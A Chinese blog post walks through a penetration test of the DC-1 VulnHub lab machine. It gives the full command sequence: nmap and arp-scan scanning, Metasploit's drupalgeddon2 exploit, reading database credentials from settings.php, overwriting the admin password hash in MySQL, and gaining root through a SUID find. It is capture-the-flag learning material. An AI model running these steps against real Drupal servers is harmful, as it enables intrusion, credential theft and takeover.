首页 > 其他分享 >DC-1靶机渗透测试过程(个人学习)

DC-1靶机渗透测试过程(个人学习)

时间:2024-05-30 21:54:49浏览次数:24  
标签:hash 查看 渗透 可以 DC 密码 flag4 靶机


DC-1靶场下载地址:

DC: 1 ~ VulnHub

攻击机kali的IP地址:192.168.37.129
注意靶机和攻击机的环境配置要一致

一、信息收集

方法一:nmap扫描

方法二:arp-scan -l
使用  arp-scan -l  扫描该网段内其他的IP地址效率相对快一些

扫描后得到靶机的IP地址为:192.168.37.133

使用nmap扫描靶机的IP,发现其22、80、111端口开放

访问该IP的80端口,是一个登录页面,同时通过Wappalyzer可以看出该网站的CMS系统为Drupal 7

对于一个登录框,总会有些奇怪的想法,尝试了弱口令、sql注入、暴力破解都不行

二、漏洞利用

前面通过Wappalyzer发现该网站的CMS为Drupal 7,则可以进入msf查找相应模块的漏洞是否可以利用

1、进入msf![]
msfconsole

2、查找相应的模块的漏洞
search Drupal

可以看到有很多版本,这里选择使用exploit/unix/webapp/drupal_drupalgeddon2,这个版本比较新,优先级也较高
利用该模块,并查看该配置选项,可以利用这个模块的payload建立一个反向的tcp连接到靶机。
yes的地方是必填的地方,大多数基本上默认都填写好了,所以只需要填靶机的IP即可

配置RHOSTS为靶机的IP地址
set RHOSTS 192.168.37.133

配置成功后直接运行
run 或 exploit

现在可以看到session已经成功建立,接下来获得shell

为了方便观看与使用,再使用python反弹shell
python -c "import pty;pty.spawn('/bin/bash')"

三、获取flag

flag1

建立反弹shell后,查看该目录下的文件可以发现flag1.txt,cat即可获得到flag1.txt

flag2

flag1.txt提示:每个好的CMS都需要一个配置文件——你也是

搜索一下Drupal的配置文件的路径为:/var/www/sites/default/settings.php
查看该配置文件的内容
cat /var/www/sites/default/settings.php

得到了flag2,也得到了一个提示
*暴力和字典攻击不是最常见的
*只有获得访问权限的方法(您将需要访问权限)。
*你能用这些证书做什么?

flag3

获取到flag2和提示的同时也获得了数据库的账号与密码

我们可以尝试使用该用户名和密码登录数据库![]
mysql -udbuser -pR0ck3t

登录成功后查看库![]
show databases;

进入drupaldb库中
use drupaldb;

查看该库中的表
show tables;

可以发现库中有一个 users 表,一般users表中存放着用户的信息,查看表中内容
select * from users;

可以看到admin账号密码的hash值,对于hash值的破解基本上不太现实,可以尝试将admin的密码替换,所以需要找一下加密的文件。

百度搜索一下可以知道 Drupal 7 的hash密码脚本存放于script目录下的password-hash.s 
使用该脚本对 “12345” 这个值进行hash

php scripts/password-hash.sh 123456

可以得到“123456” 的hash值,将hash后的密码复制

回到数据库中使用update命令更改密码,更改完再查看一下是否成功更改了密码

update users set pass='$S$DRchherDZrUWkE7m5gohDT75xMO1MXq.Ivcv3B88F0WVHT8U47Tp' where uid=1;

可以看到密码已经更改,访问页面输入账号密码登录即可

在网站中四处逛逛,不难发现flag3,点击flag3便跳转页面显示flag3的内容

flag4

flag4其实一开始就发现,成功建立shell后,cat /etc/passwd 查看用户信息的时候就发现存在要给flag4的用户

切换到/home/flag4目录下,可以发现flag4.txt文件,提取即可看到flag4.txt 的提示

flag5

find提权
显示 你是否能用同样的方法用root用户查看此flag,发现提示权限不够

既然要提权,那我们查看一下有哪些suid权限
使用以下命令查看具有suid权限的命令:
find / -perm -u=s -type f 2>/dev/null

可以看到find就在其中,那就可以使用find提权

使用以下命令进行提权,提权成功后查看权限可以发现已经是root用户

find -exec "/bin/sh" ;

已经获得到了root的权限,即可切换到 /root 目录下可以找到最后一个flag

标签:hash,查看,渗透,可以,DC,密码,flag4,靶机
From: https://www.cnblogs.com/M1ke/p/18223286

相关文章

  • 基于DCT变换和位平面分解的数字水印嵌入提取算法matlab仿真
    1.算法运行效果图预览    2.算法运行软件版本matlab2022a 3.算法理论概述    基于离散余弦变换(DiscreteCosineTransform,DCT)和位平面分解(Bit-PlaneDecomposition)的数字水印嵌入与提取算法,是一种结合了频域与空域特性的稳健数字水印技术。该方法利......
  • 渗透测试之信息收集篇
    前言信息收集的重要性进行渗透测试之前,最重要的一步就是信息收集。信息收集可以让渗透者选择合适和准确的渗透测试攻击方式,缩短渗透测试时间。所谓知己知彼,百战不殆,我们越了解测试目标,测试的工作就越容易。最后能否成功渗透进入目标,很大程度上取决于信息搜集。 ......
  • BOSHIDA 如何选择适合自己应用的AC/DC电源模块?
    BOSHIDA如何选择适合自己应用的AC/DC电源模块?AC/DC电源模块是将交流电转换为直流电的设备,广泛应用于各种电子设备中。选择适合自己应用的AC/DC电源模块需要考虑多个因素。 一,需要考虑电源模块的功率。功率是一个衡量电源模块输出能力的重要指标,通常以瓦特(W)为单位。根据应用......
  • GDCPC2024
    按照赛后写的顺序。I\(a_x\gea_y+a_z\)代表有两个必须的条件是\(a_x>a_y\)和\(a_x>a_z\),发现这虽然不是一种偏序,但是它仍然具有传递性,所以建一张DAG后toposort。从最后的点开始依次确定值。时间复杂度\(O(n+m)\)。#include<bits/stdc++.h>#defineintlonglong#def......
  • 大话BLDC驱动:怎么根据HALL信号换相
    根据《大话BLDC驱动:为什么可以根据HALL信号换相?》文中内容,我们知道HALL信号实时反应了电机转子的位置,所以,针对有感BLDC,我们当然可以根据HALL信号进行换相。那么,问题来了,根据HALL信号换相的方法及其步骤是什么?有什么细节?有什么要注意?本文就来梳理一下。1.有感BLDC8线接口定义3......
  • 京准科技:DCS系统时钟同步(NTP时间服务器)技术应用方案
    京准科技:DCS系统时钟同步(NTP时间服务器)技术应用方案京准科技:DCS系统时钟同步(NTP时间服务器)技术应用方案京准电子官微——ahjzsz前言   随着计算机和网络通信技术的飞速发展,各行业自动化系统数字化、网络化的时代已经到来。这一方面为各控制和信息系统之间的数据交换、分析......
  • 制作Dcoker镜像
    文章目录一、Docker构建镜像的原理1、镜像分层原理2、Docker的镜像结构3、分层存储原理4、构建命令与层的关系5、最终镜像的创建二、dockercommit构建镜像1、使用场景2、手动制作yum版的nginx镜像2.1、启动一个centos容器,安装好常用的软件以及nginx2.2、关闭nginx后台......
  • at-rule or selector expectedcss(css-ruleorselectorexpected)
    问题如图所示,在使用scss和less是使用//注释就会出现红色报错,这个不影响运行,但是看着很不舒服。解决没有找到什么好的解决办法,一般的解决方法是,把验证关闭,然后重启。但是后面我开启这个设置,再进行注释,没有报错,感觉还是重启的作用。先放着不管吧。......
  • 基础入门 one week (渗透测试常用专业术语)
    POC:全称'ProofofConcept',中文'概念验证',常指一段漏洞证明的代码。EXP:全称'Exploit',中文'利用',指利用系统漏洞进行攻击的动作。(有了POC,才有EXP)Payload:中文'有效载荷',指成功exploit之后,真正在目标系统执行的代码或指令。Shellcode:简单翻译'shell代码',是Pa......
  • BOSHIDA AC/DC电源模块:可靠持久的能源供应
    BOSHIDAAC/DC电源模块:可靠持久的能源供应AC/DC电源模块是一种被广泛应用于工业、通信、医疗等领域的电源设备。其可靠持久的能源供应能够保证设备的正常运行和稳定性能,具有重要的意义。在本文中,我们将详细介绍AC/DC电源模块的特点和优势。 AC/DC电源模块是一种将交流电转化......